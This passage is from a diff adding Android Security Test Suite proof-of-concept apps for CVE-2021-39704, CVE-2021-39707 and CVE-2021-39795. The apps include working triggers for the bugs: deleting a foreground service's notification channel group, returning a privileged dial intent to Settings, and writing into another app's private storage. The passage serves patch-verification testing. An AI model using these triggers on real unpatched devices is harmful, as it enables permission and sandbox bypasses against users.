+ </application>
+
+ <instrumentation
+ android:name="androidx.test.runner.AndroidJUnitRunner"
+ android:targetPackage="android.security.cts.CVE_2021_39704" />
+</manifest>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-39704/res/values/integers.xml b/hostsidetests/securitybulletin/test-apps/CVE-2021-39704/res/values/integers.xml
new file mode 100644
index 00000000000..ec924a9a275
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-39704/res/values/integers.xml
@@ -0,0 +1,24 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ Copyright 2022 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+ -->
+<resources>
+ <integer name="pass">2</integer>
+ <integer name="timeoutMs">5000</integer>
+ <integer name="assumptionFailure">3</integer>
+ <integer name="fail">1</integer>
+ <integer name="width">50</integer>
+ <integer name="height">50</integer>
+</resources>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-39704/res/values/strings.xml b/hostsidetests/securitybulletin/test-apps/CVE-2021-39704/res/values/strings.xml
new file mode 100644
index 00000000000..ab82c01b528
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-39704/res/values/strings.xml
@@ -0,0 +1,27 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ Copyright 2022 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+ -->
+<resources>
+ <string name="channel">channel</string>
+ <string name="failMessage">Failed to open </string>
+ <string name="group">group</string>
+ <string name="groupId">groupId</string>
+ <string name="messageKey">messageKey</string>
+ <string name="passMessage">Passed</string>
+ <string name="resultKey">resultKey</string>
+ <string name="sharedPreference">sharedPreference</string>
+ <string name="vulnerableMessage">Vulnerable to b/209965481</string>
+</resources>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-39704/src/android/security/cts/CVE_2021_39704/DeviceTest.java b/hostsidetests/securitybulletin/test-apps/CVE-2021-39704/src/android/security/cts/CVE_2021_39704/DeviceTest.java
new file mode 100644
index 00000000000..633622957d0
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-39704/src/android/security/cts/CVE_2021_39704/DeviceTest.java
@@ -0,0 +1,85 @@
+/*
+ * Copyright (C) 2022 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2021_39704;
+
+import static androidx.test.core.app.ApplicationProvider.getApplicationContext;
+import static org.junit.Assert.assertNotEquals;
+import static org.junit.Assume.assumeNoException;
+import static org.junit.Assume.assumeTrue;
+
+import android.content.Context;
+import android.content.Intent;
+import android.content.SharedPreferences;
+import android.content.SharedPreferences.OnSharedPreferenceChangeListener;
+import android.content.pm.PackageManager;
+
+import androidx.test.runner.AndroidJUnit4;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+import java.util.concurrent.TimeUnit;
+import java.util.concurrent.Semaphore;
+
+@RunWith(AndroidJUnit4.class)
+public class DeviceTest {
+
+ @Test
+ public void testdeleteNotificationChannelGroup() {
+ try {
+ Context context = getApplicationContext();
+ PackageManager packageManager = context.getPackageManager();
+ Intent intent = packageManager
+ .getLaunchIntentForPackage(context.getPackageName());
+ intent.addFlags(Intent.FLAG_ACTIVITY_CLEAR_TASK);
+
+ context.startActivity(intent);
+ SharedPreferences sh = context.getSharedPreferences(
+ context.getString(R.string.sharedPreference),
+ Context.MODE_APPEND);
+ final Semaphore preferenceChanged = new Semaphore(0);
+ OnSharedPreferenceChangeListener listener = new OnSharedPreferenceChangeListener() {
+ @Override
+ public void onSharedPreferenceChanged(
+ SharedPreferences sharedPreferences, String key) {
+ if (key.equals(context.getString(R.string.resultKey))) {
+ if (sharedPreferences.getInt(key, 0) == context
+ .getResources().getInteger(R.integer.pass)) {
+ preferenceChanged.release();
+ }
+ }
+ }
+ };
+ sh.registerOnSharedPreferenceChangeListener(listener);
+ preferenceChanged.tryAcquire(
+ context.getResources().getInteger(R.integer.timeoutMs),
+ TimeUnit.MILLISECONDS);
+
+ int result = sh.getInt(context.getString(R.string.resultKey),
+ context.getResources().getInteger(R.integer.pass));
+ String message = sh.getString(
+ context.getString(R.string.messageKey),
+ context.getString(R.string.passMessage));
+ assumeTrue(message, result != context.getResources()
+ .getInteger(R.integer.assumptionFailure));
+ assertNotEquals(message, result,
+ context.getResources().getInteger(R.integer.fail));
+ } catch (Exception e) {
+ assumeNoException(e);
+ }
+ }
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-39704/src/android/security/cts/CVE_2021_39704/PocActivity.java b/hostsidetests/securitybulletin/test-apps/CVE-2021-39704/src/android/security/cts/CVE_2021_39704/PocActivity.java
new file mode 100644
index 00000000000..60ce757808f
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-39704/src/android/security/cts/CVE_2021_39704/PocActivity.java
@@ -0,0 +1,59 @@
+/*
+ * Copyright (C) 2022 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2021_39704;
+
+import android.app.Activity;
+import android.Manifest;
+import android.content.Context;
+import android.content.Intent;
+import android.content.pm.PackageManager;
+import android.content.SharedPreferences;
+import android.os.Bundle;
+
+//PocActitvity is required because requestPermissions needs to implemented to request location permission.
+public class PocActivity extends Activity {
+
+ @Override
+ protected void onCreate(Bundle savedInstanceState) {
+ try {
+ super.onCreate(savedInstanceState);
+ if (this.checkCallingOrSelfPermission(
+ Manifest.permission.ACCESS_COARSE_LOCATION) != PackageManager.PERMISSION_GRANTED) {
+ startForegroundService(new Intent(this, PocService.class));
+ this.requestPermissions(
+ new String[] {
+ Manifest.permission.ACCESS_COARSE_LOCATION },0);
+ }
+ } catch (Exception e) {
+ setExceptionStatus(e.toString(),
+ getResources().getInteger(R.integer.assumptionFailure));
+ }
+ }
+
+ private void setExceptionStatus(String message, int status) {
+ try {
+ SharedPreferences sh = getSharedPreferences(
+ getString(R.string.sharedPreference), Context.MODE_PRIVATE);
+ SharedPreferences.Editor edit = sh.edit();
+ edit.putInt(getString(R.string.resultKey), status);
+ edit.putString(getString(R.string.messageKey), message);
+ edit.commit();
+ } catch (Exception e) {
+ // ignore exception
+ }
+ }
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-39704/src/android/security/cts/CVE_2021_39704/PocService.java b/hostsidetests/securitybulletin/test-apps/CVE-2021-39704/src/android/security/cts/CVE_2021_39704/PocService.java
new file mode 100644
index 00000000000..23303c3c23c
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-39704/src/android/security/cts/CVE_2021_39704/PocService.java
@@ -0,0 +1,103 @@
+/*
+ * Copyright (C) 2022 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2021_39704;
+
+import android.app.Notification;
+import android.app.NotificationChannel;
+import android.app.NotificationChannelGroup;
+import android.app.NotificationManager;
+import android.app.Service;
+import android.content.Context;
+import android.content.Intent;
+import android.content.res.Resources;
+import android.content.SharedPreferences;
+import android.graphics.Bitmap;
+import android.graphics.Canvas;
+import android.graphics.Color;
+import android.graphics.drawable.Icon;
+import android.os.IBinder;
+
+//PocService is needed to build the notification when the service starts.
+public class PocService extends Service {
+
+ @Override
+ public IBinder onBind(Intent intent) {
+ return null;
+ }
+
+ @Override
+ public void onCreate() {
+ try {
+ exploitBug();
+ super.onCreate();
+ } catch (Exception e) {
+ setResult(getResources().getInteger(R.integer.assumptionFailure),
+ e.getMessage());
+ }
+ }
+
+ void exploitBug() {
+ try {
+ final NotificationManager notificationManager = getSystemService(
+ NotificationManager.class);
+ final String id = getString(R.string.channel);
+ final String groupId = getString(R.string.groupId);
+ notificationManager.createNotificationChannelGroup(
+ new NotificationChannelGroup(groupId,
+ getString(R.string.group)));
+ NotificationChannel notificationChannel = new NotificationChannel(
+ id, id, NotificationManager.IMPORTANCE_HIGH);
+ notificationChannel.setGroup(groupId);
+ notificationManager.createNotificationChannel(notificationChannel);
+ Notification notification = new Notification.Builder(this, id)
+ .setSmallIcon(createNotificationIcon()).build();
+ startForeground(1, notification);
+ setResult(getResources().getInteger(R.integer.fail),
+ getString(R.string.vulnerableMessage));
+ notificationManager.deleteNotificationChannelGroup(groupId);
+ setResult(getResources().getInteger(R.integer.fail),
+ getString(R.string.vulnerableMessage));
+ } catch (SecurityException e) {
+ setResult(getResources().getInteger(R.integer.pass),
+ getString(R.string.passMessage));
+ }
+ }
+
+ private void setResult(int result, String message) {
+ try {
+ SharedPreferences sh = getSharedPreferences(
+ getString(R.string.sharedPreference), Context.MODE_PRIVATE);
+ SharedPreferences.Editor edit = sh.edit();
+ edit.putInt(getString(R.string.resultKey), result);
+ edit.putString(getString(R.string.messageKey), message);
+ edit.commit();
+ } catch (Exception e) {
+ // ignore exception
+ }
+ }
+
+ Icon createNotificationIcon() {
+ Resources resources = getResources();
+ Bitmap testBitmap = Bitmap.createBitmap(
+ resources.getInteger(R.integer.width),
+ resources.getInteger(R.integer.height),
+ Bitmap.Config.ARGB_8888);
+ final Canvas canvas = new Canvas(testBitmap);
+ canvas.drawColor(Color.BLUE);
+ return Icon.createWithBitmap(testBitmap);
+ }
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-39707/Android.bp b/hostsidetests/securitybulletin/test-apps/CVE-2021-39707/Android.bp
new file mode 100644
index 00000000000..517619afdab
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-39707/Android.bp
@@ -0,0 +1,39 @@
+/*
+ * Copyright (C) 2022 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+package {
+ default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+android_test_helper_app {
+ name: "CVE-2021-39707",
+ defaults: [
+ "cts_support_defaults",
+ ],
+ srcs: [
+ "src/**/*.java",
+ ],
+ test_suites: [
+ "sts",
+ ],
+ static_libs: [
+ "androidx.test.rules",
+ "androidx.test.uiautomator_uiautomator",
+ "androidx.test.core",
+ ],
+ platform_apis: true,
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-39707/AndroidManifest.xml b/hostsidetests/securitybulletin/test-apps/CVE-2021-39707/AndroidManifest.xml
new file mode 100644
index 00000000000..bfb3943ba87
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-39707/AndroidManifest.xml
@@ -0,0 +1,38 @@
+<!--
+ Copyright 2022 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+ -->
+
+<manifest xmlns:android="http://schemas.android.com/apk/res/android"
+ xmlns:tools="http://schemas.android.com/tools"
+ package="android.security.cts.CVE_2021_39707">
+ <application android:label="@string/testAppLabel">
+ <receiver android:name=".PocReceiver"
+ android:exported="true">
+ <intent-filter>
+ <action android:name="android.intent.action.GET_RESTRICTION_ENTRIES" />
+ </intent-filter>
+ </receiver>
+ <activity android:name=".PocActivity"
+ android:exported="true">
+ <intent-filter>
+ <action android:name="android.intent.action.CALL_PRIVILEGED" />
+ <category android:name="android.intent.category.DEFAULT" />
+ <data android:scheme="tel" />
+ </intent-filter>
+ </activity>
+ </application>
+ <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
+ android:targetPackage="android.security.cts.CVE_2021_39707" />
+</manifest>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-39707/res/values/strings.xml b/hostsidetests/securitybulletin/test-apps/CVE-2021-39707/res/values/strings.xml
new file mode 100644
index 00000000000..902f48ce1ea
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-39707/res/values/strings.xml
@@ -0,0 +1,27 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ Copyright (C) 2022 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+-->
+
+<resources>
+ <string name="defaultSettingsPkgName">com.android.settings</string>
+ <string name="resTestAppIcon">%1$s:id/app_restrictions_settings</string>
+ <string name="testAppLabel">CVE-2021-39707</string>
+ <string name="testFailMsg">Device is vulnerable to b/200688991!!</string>
+ <string name="textAppContentAccess">App &amp; content access</string>
+ <string name="textRestrictedUser">CVE_2021_39707_RestrictedUser</string>
+ <string name="timedOutMsg">Timed out waiting for text/res \'%1$s\' on display</string>
+ <string name="uriData">tel:555-TEST</string>
+</resources>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-39707/src/android/security/cts/CVE_2021_39707/DeviceTest.java b/hostsidetests/securitybulletin/test-apps/CVE-2021-39707/src/android/security/cts/CVE_2021_39707/DeviceTest.java
new file mode 100644
index 00000000000..db3acb09a05
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-39707/src/android/security/cts/CVE_2021_39707/DeviceTest.java
@@ -0,0 +1,106 @@
+/*
+ * Copyright (C) 2022 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2021_39707;
+
+import static androidx.test.core.app.ApplicationProvider.getApplicationContext;
+import static androidx.test.platform.app.InstrumentationRegistry.getInstrumentation;
+
+import static org.junit.Assert.assertFalse;
+import static org.junit.Assume.assumeNoException;
+import static org.junit.Assume.assumeTrue;
+
+import android.content.Context;
+import android.content.Intent;
+import android.provider.Settings;
+import android.telecom.TelecomManager;
+
+import androidx.test.runner.AndroidJUnit4;
+import androidx.test.uiautomator.By;
+import androidx.test.uiautomator.BySelector;
+import androidx.test.uiautomator.UiDevice;
+import androidx.test.uiautomator.UiObject2;
+import androidx.test.uiautomator.UiScrollable;
+import androidx.test.uiautomator.UiSelector;
+import androidx.test.uiautomator.Until;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(AndroidJUnit4.class)
+public class DeviceTest {
+
+ @Test
+ public void testAppRestrictionsFragment() {
+ try {
+ /* Start the "User Settings" window */
+ Intent intent = new Intent(Settings.ACTION_USER_SETTINGS);
+ intent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK | Intent.FLAG_ACTIVITY_CLEAR_TASK);
+ Context context = getApplicationContext();
+ context.startActivity(intent);
+ String settingsPkgName =
+ intent.resolveActivity(context.getPackageManager()).getPackageName();
+ settingsPkgName =
+ (settingsPkgName == null) ? context.getString(R.string.defaultSettingsPkgName)
+ : settingsPkgName;
+
+ /*
+ * Click on the text "CVE_2021_39707_RestrictedUser", the restricted user that we added
+ * before
+ */
+ final int uiTimeoutMs = 5000;
+ String textRestrictedUser = context.getString(R.string.textRestrictedUser);
+ BySelector selector = By.text(textRestrictedUser);
+ UiDevice device = UiDevice.getInstance(getInstrumentation());
+ assumeTrue(context.getString(R.string.timedOutMsg, textRestrictedUser),
+ device.wait(Until.hasObject(selector), uiTimeoutMs));
+ device.findObject(selector).click();
+
+ /* Click on the text "App & content access" */
+ String textAppContentAccess = context.getString(R.string.textAppContentAccess);
+ selector = By.text(textAppContentAccess);
+ assumeTrue(context.getString(R.string.timedOutMsg, textAppContentAccess),
+ device.wait(Until.hasObject(selector), uiTimeoutMs));
+ device.findObject(selector).click();
+
+ /*
+ * Click on the icon with resource name
+ * "com.android.settings:id/app_restrictions_settings" next to the test app
+ * "CVE-2021-39707"
+ */
+ UiScrollable scrollable = new UiScrollable(new UiSelector());
+ String textTestApp = context.getString(R.string.testAppLabel);
+ scrollable.scrollTextIntoView(textTestApp);
+ selector = By.text(textTestApp);
+ assumeTrue(context.getString(R.string.timedOutMsg, textTestApp),
+ device.wait(Until.hasObject(selector), uiTimeoutMs));
+ UiObject2 parent = device.findObject(selector).getParent().getParent().getParent();
+ selector = By.res(context.getString(R.string.resTestAppIcon, settingsPkgName));
+ parent.findObject(selector).click();
+
+ /*
+ * Wait on the UI of the dialer app, test fails if the dialer app appears on the screen
+ * which indicates vulnerable behaviour
+ */
+ TelecomManager telecomManager = context.getSystemService(TelecomManager.class);
+ selector = By.pkg(telecomManager.getSystemDialerPackage());
+ assertFalse(context.getString(R.string.testFailMsg),
+ device.wait(Until.hasObject(selector), uiTimeoutMs));
+ } catch (Exception e) {
+ assumeNoException(e);
+ }
+ }
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-39707/src/android/security/cts/CVE_2021_39707/PocActivity.java b/hostsidetests/securitybulletin/test-apps/CVE-2021-39707/src/android/security/cts/CVE_2021_39707/PocActivity.java
new file mode 100644
index 00000000000..92645c498f8
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-39707/src/android/security/cts/CVE_2021_39707/PocActivity.java
@@ -0,0 +1,25 @@
+/*
+ * Copyright (C) 2022 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2021_39707;
+
+import android.app.Activity;
+
+// In order to detect the vulnerability, intent with action "android.intent.action.CALL_PRIVILEGED"
+// must resolve to more than 1 activity, so PocActivity is defined here with this intent to have at
+// least one activity other than the "PrivilegedCallActivity".
+public class PocActivity extends Activity {
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-39707/src/android/security/cts/CVE_2021_39707/PocReceiver.java b/hostsidetests/securitybulletin/test-apps/CVE-2021-39707/src/android/security/cts/CVE_2021_39707/PocReceiver.java
new file mode 100644
index 00000000000..6d4caae068b
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-39707/src/android/security/cts/CVE_2021_39707/PocReceiver.java
@@ -0,0 +1,41 @@
+/*
+ * Copyright (C) 2022 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2021_39707;
+
+import android.content.BroadcastReceiver;
+import android.content.Context;
+import android.content.Intent;
+import android.net.Uri;
+import android.os.Bundle;
+
+public class PocReceiver extends BroadcastReceiver {
+
+ @Override
+ public void onReceive(Context context, Intent intent) {
+ try {
+ Bundle result = new Bundle();
+ Intent dialIntent = new Intent();
+ dialIntent.setData(Uri.parse(context.getString(R.string.uriData)));
+ dialIntent.setAction(Intent.ACTION_CALL_PRIVILEGED);
+ result.putParcelable(Intent.EXTRA_RESTRICTIONS_INTENT, dialIntent);
+ setResultExtras(result);
+ } catch (Exception e) {
+ // ignore all exceptions, in the worst case, any exception caught here indicates that
+ // setting extra intent was unsuccessful, so test will pass in the worst case.
+ }
+ }
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-39795/Android.bp b/hostsidetests/securitybulletin/test-apps/CVE-2021-39795/Android.bp
new file mode 100644
index 00000000000..ade2215f2d7
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-39795/Android.bp
@@ -0,0 +1,36 @@
+/*
+ * Copyright (C) 2022 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package {
+ default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+android_test_helper_app {
+ name: "CVE-2021-39795",
+ defaults: [
+ "cts_support_defaults"
+ ],
+ srcs: [
+ "src/**/*.java",
+ ],
+ test_suites: [
+ "sts",
+ ],
+ static_libs: [
+ "androidx.test.rules",
+ "androidx.test.core",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-39795/AndroidManifest.xml b/hostsidetests/securitybulletin/test-apps/CVE-2021-39795/AndroidManifest.xml
new file mode 100644
index 00000000000..cb42aedc255
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-39795/AndroidManifest.xml
@@ -0,0 +1,27 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ Copyright 2022 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+ -->
+
+<manifest xmlns:android="http://schemas.android.com/apk/res/android"
+ package="android.security.cts.CVE_2021_39795">
+ <uses-sdk android:minSdkVersion="21" android:targetSdkVersion="28"/>
+ <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
+ <uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE"/>
+ <uses-permission android:name="android.permission.MANAGE_EXTERNAL_STORAGE"/>
+ <instrumentation
+ android:name="androidx.test.runner.AndroidJUnitRunner"
+ android:targetPackage="android.security.cts.CVE_2021_39795" />
+</manifest>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-39795/res/values/strings.xml b/hostsidetests/securitybulletin/test-apps/CVE-2021-39795/res/values/strings.xml
new file mode 100644
index 00000000000..19ea461d4cb
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-39795/res/values/strings.xml
@@ -0,0 +1,32 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ Copyright 2022 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+ -->
+
+<resources>
+ <string name="filePath">Android/data/CVE-2021-39795-dir/</string>
+ <string name="fileContent">Bypassed by MediaProvider</string>
+ <string name="fileName">CVE-2021-39795-file</string>
+ <string name="external">external</string>
+ <string name="secondFixFailure">Second Fix Patch not applied.
+ Please Apply second Fix Patch!!</string>
+ <string name="fileUtilPkg">com.android.providers.media.util.FileUtils</string>
+ <string name="isDataOrObbPathMethod">isDataOrObbPath</string>
+ <string name="mediaProviderPkg">com.android.providers.media.module</string>
+ <string name="sampleFilePath">/storage/emulated/0/Android/data/foo</string>
+ <string name="failure">Device vulnerable to b/201667614! Any app with
+ MANAGE_EXTERNAL_STORAGE permission can write into other apps private
+ external directory.</string>
+</resources>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-39795/src/android/security/cts/CVE_2021_39795/DeviceTest.java b/hostsidetests/securitybulletin/test-apps/CVE-2021-39795/src/android/security/cts/CVE_2021_39795/DeviceTest.java
new file mode 100644
index 00000000000..8d3ff0a9602
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-39795/src/android/security/cts/CVE_2021_39795/DeviceTest.java
@@ -0,0 +1,94 @@
+/*
+ * Copyright (C) 2022 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2021_39795;
+
+import static androidx.test.core.app.ApplicationProvider.getApplicationContext;
+import static org.junit.Assert.fail;
+import static org.junit.Assume.assumeNoException;
+
+import android.content.Context;
+import android.content.ContentResolver;
+import android.content.ContentValues;
+import android.content.res.Resources;
+import android.provider.MediaStore;
+
+import androidx.test.runner.AndroidJUnit4;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+import java.io.OutputStream;
+import java.lang.reflect.Method;
+
+@RunWith(AndroidJUnit4.class)
+public class DeviceTest {
+
+ @Test
+ public void testFilePresence() {
+ boolean isSecondPatchAbsent = false;
+ Resources resources = null;
+ OutputStream outputStream = null;
+ try {
+ // Accessing FileUtils.isDataOrObbPath() to detect the presence of second patch of fix.
+ Context context = getApplicationContext();
+ resources = context.getResources();
+ Context mediaProviderContext =
+ context.createPackageContext(resources.getString(R.string.mediaProviderPkg),
+ Context.CONTEXT_INCLUDE_CODE | Context.CONTEXT_IGNORE_SECURITY);
+ ClassLoader fileUtilsClassLoader = mediaProviderContext.getClassLoader();
+ Class<?> FileUtilsClass =
+ fileUtilsClassLoader.loadClass(resources.getString(R.string.fileUtilPkg));
+ Method isDataOrObbPathMethod = FileUtilsClass.getDeclaredMethod(
+ resources.getString(R.string.isDataOrObbPathMethod), String.class);
+ isDataOrObbPathMethod.setAccessible(true);
+ isSecondPatchAbsent = (boolean) isDataOrObbPathMethod.invoke(this,
+ resources.getString(R.string.sampleFilePath));
+
+ // Checking write into external directory.
+ ContentValues values = new ContentValues();
+ ContentResolver contentResolver = context.getContentResolver();
+ values.put(MediaStore.MediaColumns.RELATIVE_PATH,
+ resources.getString(R.string.filePath));
+ values.put(MediaStore.MediaColumns.DISPLAY_NAME,
+ resources.getString(R.string.fileName));
+ outputStream = contentResolver.openOutputStream(contentResolver.insert(
+ MediaStore.Files.getContentUri(resources.getString(R.string.external)),
+ values));
+ outputStream.write(resources.getString(R.string.fileContent).getBytes());
+
+ /*
+ * If control flow has reached till this point it means no exception anywhere and fix is
+ * not present and it is vulnerable to the bug.
+ */
+ fail(resources.getString(R.string.failure));
+ } catch (IllegalArgumentException e) {
+ // First fix patch is applied, ignore this exception.
